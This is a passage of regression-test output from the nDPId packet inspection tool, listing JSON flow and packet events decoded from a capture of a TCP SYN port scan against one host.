+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAslw0AADIGf2WsEAAIQA2GNIzTC8ndU4MZAAAAAGACDAAgwwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsfFsAADIGmhesEAAIQA2GNIzTJxLdU4MZAAAAAGACDAAFegAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRAAADkGrmKsEAAIQA2GNIzTBGvdU4MZAAAAAGACCAAsIQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAskzsAADEGhDesEAAIQA2GNIzTARjdU4MZAAAAAGACCAAvdAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsr9IAADkGX6CsEAAIQA2GNIzTBzDdU4MZAAAAAGACCAApXAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsuXkAADkGVfmsEAAIQA2GNIzTG1jdU4MZAAAAAGACCAAVNAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsOXwAADEG3fasEAAIQA2GNIzTCd3dU4MZAAAAAGACCAAmrwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsNxwAADQG3VasEAAIQA2GNIzTGPXdU4MZAAAAAGACBAAblwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsJVkAACwG9xmsEAAIQA2GNIzTBGPdU4MZAAAAAGACBAAwKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsDfUAACkGEX6sEAAIQA2GNIzTJcLdU4MZAAAAAGACCAAKygAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsmA4AADEGf2SsEAAIQA2GNIzTn8\/dU4MZAAAAAGACCACQvAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058656,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058656,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7UAACkG172sEAAIQA2GNIzTGrfdU4MZAAAAAGACCAAV1QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs4CAAACsGPVKsEAAIQA2GNIzTSp3dU4MZAAAAAGACEADd7gAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wMAADgGPW+sEAAIQA2GNIzTAyHdU4MZAAAAAGACBAAxawAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC8AADgGeEOsEAAIQA2GNIzTD07dU4MZAAAAAGACBAAlPgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsWfUAADoGtH2sEAAIQA2GNIzT8n7dU4MZAAAAAGACDAA6DQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACYG5wysEAAIQA2GNIzTC+zdU4MZAAAAAGACDAAgoAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsT1UAACkG0B2sEAAIQA2GNIzTBNzdU4MZAAAAAGACCAArsAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsowkAAC0GeGmsEAAIQA2GNIzTAprdU4MZAAAAAGACCAAt8gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsNmQAAC4G5A6sEAAIQA2GNIzTCU7dU4MZAAAAAGACDAAjPgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAslb0AACYGjLWsEAAIQA2GNIzTDSndU4MZAAAAAGACDAAfYwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs9egAADAGIoqsEAAIQA2GNIzTABrdU4MZAAAAAGACBAA0cgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpsAACcGGtisEAAIQA2GNIzTX3zdU4MZAAAAAGACEADJDwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsFHoAADIGAfmsEAAIQA2GNIzTDubdU4MZAAAAAGACDAAdpgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAshuMAADUGjI+sEAAIQA2GNIzTGivdU4MZAAAAAGACCAAWYQAAAgQFtA=="} 